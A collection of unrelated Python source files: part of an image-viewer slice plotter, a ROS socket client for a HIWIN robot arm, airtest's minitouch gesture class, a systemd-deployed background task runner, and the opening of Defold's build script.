if conf.slice_onmotion:
ix, iy = int(round(x)), int(round(y))
if (ix >= 0 and ix < conf.data.shape[1] and
iy >= 0 and iy < conf.data.shape[0]):
conf.slice_xy = ix, iy
self.update_slices()
def report_leftdown(self,event=None):
if event == None:
return
if event.xdata is None or event.ydata is None:
return
ix, iy = int(round(event.xdata)), int(round(event.ydata))
conf = self.conf
if (ix >= 0 and ix < conf.data.shape[1] and
iy >= 0 and iy < conf.data.shape[0]):
pos = ''
if conf.xdata is not None:
pos = ' %s=%.4g,' % (conf.xlab, conf.xdata[ix])
if conf.ydata is not None:
pos = '%s %s=%.4g,' % (pos, conf.ylab, conf.ydata[iy])
dval = conf.data[iy, ix]
if len(conf.data.shape) == 3:
dval = "%.4g, %.4g, %.4g" % tuple(dval)
else:
dval = "%.4g" % dval
msg = "Pixel [%i, %i], %s Intensity=%s " % (ix, iy, pos, dval)
self.write_message(msg, panel=0)
conf.slice_xy = ix, iy
self.update_slices()
if hasattr(self.cursor_callback , '__call__'):
self.cursor_callback(x=event.xdata, y=event.ydata)
def get_slice_plotframe(self):
shown = False
new_plotter = False
if self.slice_plotframe is not None:
try:
self.slice_plotframe.Raise()
shown = True
except:
pass
if not shown:
self.slice_plotframe = pf = PlotFrame(self)
new_plotter = True
try:
xpos, ypos = self.parent.GetPosition()
xsiz, ysiz = self.parent.GetSize()
pf.SetPosition((xpos+xsiz+10, ypos))
except:
pass
return new_plotter, self.slice_plotframe
def update_slices(self):
if self.conf.slices in ('None', None, 0):
return
x, y = -1, -1
try:
x, y = [int(a) for a in self.conf.slice_xy]
except:
return
if len(self.conf.data.shape) == 3:
ymax, xmax, nc = self.conf.data.shape
elif len(self.conf.data.shape) == 2:
ymax, xmax = self.conf.data.shape
nc = 0
else:
return
if x < 0 or y < 0 or x > xmax or y > ymax:
return
wid = int(self.conf.slice_width)
new_plotter, pf = self.get_slice_plotframe()
popts = {'ylabel': 'Intensity', 'linewidth': 3}
if self.conf.slices.lower() == 'x':
y1 = int(y - wid/2. + 1)
y2 = int(y + wid/2.) + 1
if y1 < 0: y1 = 0
if y2 > ymax: y2 = ymax
_x = self.conf.xdata
if _x is None:
_x = np.arange(self.conf.data.shape[1])
_y = self.conf.data[y1:y2].sum(axis=0)
popts['xlabel'] = 'X'
popts['title'] = 'X Slice: Y=%d:%d' % (y1, y2)
if y2 == y1+1:
popts['title'] = 'X Slice: Y=%d' % y1
else:
x1 = int(x - wid/2.0 + 1)
x2 = int(x + wid/2.0) + 1
if x1 < 0: x1 = 0
if x2 > xmax: x2 = xmax
_x = self.conf.ydata
if _x is None:
_x = np.arange(self.conf.data.shape[0])
_y = self.conf.data[:,x1:x2].sum(axis=1)
popts['xlabel'] = 'Y'
popts['title'] = 'Y Slice: X=%d:%d' % (x1, x2)
if x2 == x1+1:
popts['title'] = 'Y Slice: X=%d' % x1
if new_plotter:
if len(_y.shape) == 2 and _y.shape[1] == 3:
pf.plot(_x, _y[:, 0], color=RGB_COLORS[0], delay_draw=True, **popts)
pf.oplot(_x, _y[:, 1], color=RGB_COLORS[1], delay_draw=True, **popts)
pf.oplot(_x, _y[:, 2], color=RGB_COLORS[2], **popts)
else:
pf.plot(_x, _y, **popts)
else:
pf.panel.set_title(popts['title'], delay_draw=True)
pf.panel.set_xlabel(popts['xlabel'], delay_draw=True)
if len(_y.shape) == 2 and _y.shape[1] == 3:
pf.update_line(0, _x, _y[:, 0], update_limits=True, draw=False)
pf.update_line(1, _x, _y[:, 1], update_limits=True, draw=False)
pf.update_line(2, _x, _y[:, 2], update_limits=True, draw=True)
else:
pf.update_line(0, _x, _y, update_limits=True, draw=True)
pf.Show()
self.SetFocus()
try:
self.parent.Raise()
except:
pass
|
HiwinRA605_socket_ros_20190604112000.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
if case(Taskcmd.Action_Type.Mode):
data = TCP.SetMode(socket_cmd.grip,0)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
feedback = 0
socket_client_arm_state(feedback)
print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
feedback = 1
socket_client_arm_state(feedback)
print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Arm_feedback = TCP.Is_busy(feedback)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
base_touch.py | # -*- coding: utf-8 -*-
import threading
import time
import six
from six.moves import queue
from airtest.utils.logger import get_logger
from airtest.utils.snippet import (on_method_ready, ready_method, reg_cleanup)
LOGGING = get_logger(__name__)
class BaseTouch(object):
"""
A super class for Minitouch or Maxtouch
"""
def __init__(self, adb, backend=False, ori_function=None, input_event=None):
self.adb = adb
self.backend = backend
self.server_proc = None
self.client = None
self.size_info = None
self.input_event = input_event
self.handle = None
self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo
self.default_pressure = 50
self.path_in_android = ""
reg_cleanup(self.teardown)
@ready_method
def install_and_setup(self):
"""
Install and setup airtest touch
Returns:
None
"""
self.install()
self.size_info = self.ori_function()
self.setup_server()
if self.backend:
self.setup_client_backend()
else:
self.setup_client()
def uninstall(self):
"""
Uninstall airtest touch
Returns:
None
"""
raise NotImplemented
def install(self):
"""
Install airtest touch
Returns:
None
"""
raise NotImplemented
def setup_server(self):
"""
Setip touch server and adb forward
Returns:
server process
"""
raise NotImplemented
def safe_send(self, data):
"""
Send data to client
Args:
data: data to send
Raises:
Exception: when data cannot be sent
Returns:
None
"""
if isinstance(data, six.text_type):
data = data.encode('utf-8')
try:
self.client.send(data)
except Exception as err:
# raise MinitouchError(err)
raise err
def _backend_worker(self):
"""
Backend worker queue thread
Returns:
None
"""
while not self.backend_stop_event.isSet():
cmd = self.backend_queue.get()
if cmd is None:
break
self.safe_send(cmd)
def setup_client_backend(self):
"""
Setup backend client thread as daemon
Returns:
None
"""
self.backend_queue = queue.Queue()
self.backend_stop_event = threading.Event()
self.setup_client()
t = threading.Thread(target=self._backend_worker, name="airtouch")
# t.daemon = True
t.start()
self.backend_thread = t
self.handle = self.backend_queue.put
def setup_client(self):
"""
Setup client
Returns:
None
"""
raise NotImplemented
def teardown(self):
"""
Stop the server and client
Returns:
None
"""
if hasattr(self, "backend_stop_event"):
self.backend_stop_event.set()
self.backend_queue.put(None)
if self.client:
self.client.close()
if self.server_proc:
self.server_proc.kill()
def transform_xy(self, x, y):
"""
Transform coordinates (x, y) according to the device display
Args:
x: coordinate x
y: coordinate y
Returns:
transformed coordinates (x, y)
"""
return x, y
@on_method_ready('install_and_setup')
def perform(self, motion_events, interval=0.01):
"""
Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent
Args:
motion_events: a list of MotionEvent instances
interval: minimum interval between events
Returns:
None
"""
for event in motion_events:
if isinstance(event, SleepEvent):
time.sleep(event.seconds)
else:
cmd = event.getcmd(transform=self.transform_xy)
self.handle(cmd)
time.sleep(interval)
@on_method_ready('install_and_setup')
def touch(self, tuple_xy, duration=0.01):
"""
Perform touch event
minitouch protocol example::
d 0 10 10 50
c
<wait in your own code>
u 0
c
Args:
tuple_xy: coordinates (x, y)
duration: time interval for touch event, default is 0.01
Returns:
None
"""
touch_events = [DownEvent(tuple_xy, pressure=self.default_pressure), SleepEvent(duration), UpEvent()]
self.perform(touch_events)
def __swipe_move(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Return a sequence of swipe motion events (only MoveEvent)
minitouch protocol example::
d 0 0 0 50
c
m 0 20 0 50
c
m 0 40 0 50
c
m 0 60 0 50
c
m 0 80 0 50
c
m 0 100 0 50
c
u 0
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
[MoveEvent(from_x, from_y), ..., MoveEvent(to_x, to_y)]
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
ret = []
interval = float(duration) / (steps + 1)
for i in range(1, steps):
ret.append(MoveEvent((from_x + (to_x - from_x) * i / steps,
from_y + (to_y - from_y) * i / steps)))
ret.append(SleepEvent(interval))
ret += [MoveEvent((to_x, to_y), pressure=self.default_pressure), SleepEvent(interval)]
return ret
@on_method_ready('install_and_setup')
def swipe_along(self, coordinates_list, duration=0.8, steps=5):
"""
Perform swipe event across multiple points in sequence.
Args:
coordinates_list: list of coordinates: [(x1, y1), (x2, y2), (x3, y3)]
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
tuple_from_xy = coordinates_list[0]
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
for tuple_to_xy in coordinates_list[1:]:
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
tuple_from_xy = tuple_to_xy
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Perform swipe event.
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5, offset=(0, 50)):
"""
Perform two finger swipe action
minitouch protocol example::
d 0 0 0 50
d 1 1 0 50
c
m 0 20 0 50
m 1 21 0 50
c
m 0 40 0 50
m 1 41 0 50
c
m 0 60 0 50
m 1 61 0 50
c
m 0 80 0 50
m 1 81 0 50
c
m 0 100 0 50
m 1 101 0 50
c
u 0
u 1
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
offset: coordinate offset of the second finger, default is (0, 50)
Returns:
None
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
# 根据偏移量计算第二个手指的坐标
from_x2, from_y2 = (min(max(0, from_x + offset[0]), self.size_info['width']),
min(max(0, from_y + offset[1]), self.size_info['height']))
to_x2, to_y2 = (min(max(0, to_x + offset[0]), self.size_info['width']),
min(max(0, to_y + offset[1]), self.size_info['height']))
swipe_events = [DownEvent(tuple_from_xy, contact=0, pressure=self.default_pressure),
DownEvent((from_x2, from_y2), contact=1, pressure=self.default_pressure),
]
interval = float(duration) / (steps + 1)
for i in range(1, steps + 1):
move_events = [
SleepEvent(interval),
MoveEvent((from_x + ((to_x - from_x) * i / steps), from_y + (to_y - from_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((from_x2 + (to_x2 - from_x2) * i / steps, from_y2 + (to_y2 - from_y2) * i / steps),
contact=1, pressure=self.default_pressure),
]
swipe_events.extend(move_events)
swipe_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'):
"""
Perform pinch action
minitouch protocol example::
d 0 0 100 50
d 1 100 0 50
c
m 0 10 90 50
m 1 90 10 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 30 70 50
m 1 70 30 50
c
m 0 40 60 50
m 1 60 40 50
c
m 0 50 50 50
m 1 50 50 50
c
u 0
u 1
c
Args:
center: the center point of the pinch operation
percent: pinch distance to half of screen, default is 0.5
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
in_or_out: pinch in or pinch out, default is 'in'
Returns:
None
Raises:
TypeError: An error occurred when center is not a list/tuple or None
"""
w, h = self.size_info['width'], self.size_info['height']
if isinstance(center, (list, tuple)):
x0, y0 = center
elif center is None:
x0, y0 = w / 2, h / 2
else:
raise TypeError("center should be None or list/tuple, not %s" % repr(center))
x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2
x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2
pinch_events = []
interval = float(duration) / (steps + 1)
# 根据in还是out,设定双指滑动的起始和结束坐标
if in_or_out == 'in':
start_pos1_x, start_pos1_y = x1, y1
start_pos2_x, start_pos2_y = x2, y2
end_pos1_x, end_pos1_y = x0, y0
end_pos2_x, end_pos2_y = x0, y0
else:
start_pos1_x, start_pos1_y = x0, y0
start_pos2_x, start_pos2_y = x0, y0
end_pos1_x, end_pos1_y = x1, y1
end_pos2_x, end_pos2_y = x2, y2
# 开始定义pinch的操作
pinch_events.extend([
DownEvent((start_pos1_x, start_pos1_y), contact=0, pressure=self.default_pressure),
DownEvent((start_pos2_x, start_pos2_y), contact=1, pressure=self.default_pressure)
])
for i in range(1, steps):
pinch_events.extend([
SleepEvent(interval),
MoveEvent((start_pos1_x + (end_pos1_x - start_pos1_x) * i / steps,
start_pos1_y + (end_pos1_y - start_pos1_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((start_pos2_x + (end_pos2_x - start_pos2_x) * i / steps,
start_pos2_y + (end_pos2_y - start_pos2_y) * i / steps),
contact=1, pressure=self.default_pressure)
])
pinch_events.extend([
SleepEvent(interval),
MoveEvent((end_pos1_x, end_pos1_y), contact=0, pressure=self.default_pressure),
MoveEvent((end_pos2_x, end_pos2_y), contact=1, pressure=self.default_pressure)
])
pinch_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(pinch_events)
@on_method_ready('install_and_setup')
def operate(self, args):
"""
Perform down, up and move actions
Args:
args: action arguments, dictionary containing type and x, y coordinates, e.g.::
{
"type" : "down",
"x" : 10,
"y" : 10
}
Raises:
RuntimeError: is invalid arguments are provided
Returns:
None
"""
if args["type"] == "down":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "d 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "move":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "m 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "up":
cmd = "u 0\nc\n"
else:
raise RuntimeError("invalid operate args: {}".format(args))
self.handle(cmd)
class MotionEvent(object):
"""
Motion Event to be performed by Minitouch/Maxtouch
"""
def getcmd(self, transform=None):
raise NotImplementedError
class DownEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Down Event
:param coordinates: finger down coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(DownEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "d {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class UpEvent(MotionEvent):
def __init__(self, contact=0):
"""
Finger Up Event
:param contact: multi-touch action, starts from 0
"""
super(UpEvent, self).__init__()
self.contact = contact
def getcmd(self, transform=None):
cmd = "u {:.0f}\nc\n".format(self.contact)
return cmd
class MoveEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Move Event
:param coordinates: finger move to coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(MoveEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "m {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class SleepEvent(MotionEvent):
def __init__(self, seconds):
self.seconds = seconds
def getcmd(self, transform=None):
return None
|
bg.py | # -*- encoding:utf-8 -*-
import os
import io
import sys
import json
import importlib
import traceback
import threading
import zen
import zen.tbw
import zen.misc
import zen.biom
import zen.task
RELEASE = threading.Event()
REPORT = {}
def setInterval(interval):
def decorator(function):
"""Main decorator function."""
def wrapper(*args, **kwargs):
"""Helper function to create thread."""
stopped = threading.Event()
# executed in another thread
def _loop():
"""Thread entry point."""
# until stopped
while not stopped.wait(interval):
function(*args, **kwargs)
t = threading.Thread(target=_loop)
# stop if the program exits
t.daemon = True
t.start()
return stopped
return wrapper
return decorator
def deploy():
normpath = os.path.normpath
with io.open("./bg.service", "w") as unit:
unit.write(u"""[Unit]
Description=Zen bg tasks
After=network.target
[Service]
User=%(usr)s
WorkingDirectory=%(wkd)s
Environment=PYTHONPATH=%(path)s
ExecStart=%(exe)s %(mod)s
Restart=always
[Install]
WantedBy=multi-user.target
""" % {
"usr": os.environ.get("USER", "unknown"),
"wkd": normpath(sys.prefix),
"path": normpath(os.path.dirname(__file__)),
"mod": normpath(os.path.abspath(__file__)),
"exe": normpath(sys.executable)
})
os.system("chmod +x ./bg.service")
os.system("sudo mv --force ./bg.service /etc/systemd/system")
os.system("sudo systemctl daemon-reload")
if not os.system("sudo systemctl restart bg"):
os.system("sudo systemctl start bg")
def _launcher(func):
name = func.__name__
try:
REPORT[name] = func()
except Exception as error:
zen.logMsg(
"%s exception:\n%r\n%s" %
(func.__name__, error, traceback.format_exc())
)
REPORT[name] = "%r" % error
def start():
info = zen.loadJson("root.json")
tasks = info.get("tasks-enabled", {})
sleep_time = info.get(
"sleep-time",
zen.tbw.rest.cfg.blocktime * zen.tbw.rest.cfg.activeDelegates
)
daemons = []
for task, params in tasks.items():
func = getattr(zen.task, task)
if callable(func):
daemons.append(setInterval(params["interval"])(_launcher)(func))
zen.logMsg(
"%s daemon set: interval=%ss" % (task, params["interval"])
)
importlib.reload(zen.task)
RELEASE.clear()
while not RELEASE.is_set():
RELEASE.wait(timeout=float(sleep_time))
zen.logMsg(
"Sleep time finished :\n%s" % json.dumps(REPORT, indent=2)
)
for daemon in daemons:
daemon.set()
if __name__ == "__main__":
import signal
def exit_handler(*args, **kwargs):
RELEASE.set()
zen.biom.pushBackKeys()
zen.logMsg("Background tasks stopped !")
zen.misc.notify("Background tasks stopped !")
def show_hidden(*args, **kwargs):
report = {}
for key, value in [
(k, v) for k, v in zen.biom.__dict__.items() if "#" in k
]:
username, num = key.replace("_", "").split("#")
if value is not None:
report[username] = report.get(username, []) + ["puk#" + num]
msg = "Loaded private keys = %s" % json.dumps(report)
zen.logMsg(msg)
zen.misc.notify(msg)
signal.signal(signal.SIGTERM, exit_handler)
if "win" not in sys.platform:
signal.signal(signal.SIGUSR1, show_hidden)
zen.logMsg("Background tasks started !")
zen.misc.notify("Background tasks started !")
try:
zen.biom.pullKeys()
start()
except KeyboardInterrupt:
exit_handler()
|
build.py | #!/usr/bin/env python
# Copyright 2020 The Defold Foundation
# Licensed under the Defold License version 1.0 (the "License"); you may not use
# this file except in compliance with the License.
#
# You may obtain a copy of the License, together with FAQs at
# https://www.defold.com/license
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# add build_tools folder to the import search path
import sys, os
from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath
sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools"))
import shutil, zipfile, re, itertools, json, platform, math, mimetypes
import optparse, subprocess, urllib, urlparse, tempfile, time
import imp
import github
import run
import s3
import release_to_github
import BuildUtility
import http_cache
from tarfile import TarFile
from glob import glob
from threading import Thread, Event
from Queue import Queue
from ConfigParser import ConfigParser
BASE_PLATFORMS = [ 'x86_64-linux',
'x86_64-darwin',
'win32', 'x86_64-win32',
'x86_64-ios', 'armv7-darwin', 'arm64-darwin',
'armv7-android', 'arm64-android',
'js-web', 'wasm-web']
try:
sys.path.insert(0, os.path.dirname(__file__))
sys.dont_write_bytecode = True
import build_private
except Exception, e:
class build_private(object):
@classmethod
def get_target_platforms(cls):
return []
@classmethod
def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host
return []
@classmethod
def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the host
return []
@classmethod
def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform
pass
@classmethod
def is_library_supported(cls, platform, library):
return True
finally:
sys.dont_write_bytecode = False
def get_target_platforms():
return BASE_PLATFORMS + build_private.get_target_platforms()
PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 PVRTexLib-4.18.0 webp-0.5.0 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.6 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 webp-0.5.0 luajit-2.1.0-beta3 tremolo-0.0.8".split()
PACKAGES_EGGS="protobuf-2.3.0-py2.5.egg pyglet-1.1.3-py2.5.egg gdata-2.0.6-py2.6.egg Jinja2-2.6-py2.6.egg Markdown-2.6.7-py2.7.egg".split()
PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split()
PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split()
PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1 MoltenVK-1.0.41".split()
PACKAGES_DARWIN="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 vpx-1.7.0".split()
PACKAGES_DARWIN_64="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 MoltenVK-1.0.41".split()
PACKAGES_WIN32="webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_WIN32_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_LINUX_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split()
PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split()
PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split()
PACKAGES_NODE_MODULES="xhr2-0.1.0".split()
DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split()
CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None)
CDN_UPLOAD_URL="s3://d.defold.com/archive"
PACKAGES_IOS_SDK="iPhoneOS14.0.sdk"
PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.0.sdk"
